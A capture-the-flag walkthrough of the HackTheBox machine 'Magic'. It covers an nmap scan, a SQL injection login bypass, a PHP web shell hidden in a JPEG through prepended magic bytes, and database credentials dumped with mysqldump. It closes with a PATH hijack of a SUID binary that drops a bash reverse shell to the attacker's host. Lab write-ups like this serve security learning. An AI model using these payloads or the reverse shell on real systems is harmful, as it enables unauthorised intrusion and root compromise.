Summary

Magic,a Linux box created by HackTheBox user TRX, was an overall easy-medium difficulty box. The initial enumeration shows only port 22 and 80 opened. The login page contain a SQL injection. which redirected us to upload.php. creating a image with a php shell we get a shell as www-data looking in db.php5 we find creds for db but we don’t see any mysql client but we see mysqldump dumping that we get credential for user theseus. Privilege Escalation on this box was pretty fun as we need to find a SUID binary and doing strings on that we see it have a command used which is not using absolute path so we can try to do a path hijacking doing that we can get a shell as root.

Initial Foothold

nmap scan

# Nmap 7.80 scan initiated Sun Apr 19 00:30:45 2020 as: nmap -sC -sV -oN nmap/magic 10.10.10.185
Nmap scan report for 10.10.10.185
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 19 00:31:30 2020 -- 1 IP address (1 host up) scanned in 44.79 seconds

Let look at the web we find a login page

so trying some simple sql injection as

admin' AND 1067=1067-- NRmh

we can bypass the login and are redirected to upload.php

Based on the box name i thought of creating a jpg which contain a php shell

Prepending magic byte in the shell

printf "\xFF\xD8\xFF\xDB" | cat - shell1.php  > shell.php.jpg

uploading this and running a curl

curl http://10.10.10.185/images/uploads/shell.php.jpg

give us the shell as www-data

User

Looking inside db.php5 in /var/www/Magic we see some credentials

<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }creds as

    public static function disconnect()

    {
        self::$cont = null;
    }
}

we get potential credential. but we are unable to su to user.
So I thought of looking in the Database but we don’t see a mysql client.enumerating i saw mysqldump was installed so i tried dumping the db with

mysqldump Magic -u theseus -p

and a credential as

INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');

using the above credential as theseus:Th3s3usW4sK1ng we can su to theseus user

Privilege Escalation

Enumerating and checking for SUID binary we find a interesting binary as sysinfo

we see that we can also read the binary so i tried doing strings on the binary and saw cat command is used in the binary without absolute path.

so i started doing path hijacking with

cd /tmp/
echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.X.X/9000 0>&1"' > cat
chmod +x cat
export PATH = /tmp/:$PATH

and running a nc listener and running sysinfo again we get a shell as root.

and we have pwned Magic 💃

Extra

When we get a shell as www-data if we read .htaccess we can see why we are able to execute the name.php.jpg as php

<FilesMatch ".+\.ph(p([3457s]|\-s)?|t|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
<Files ~ "\.(sh|sql)">

   order deny,allow
   deny from all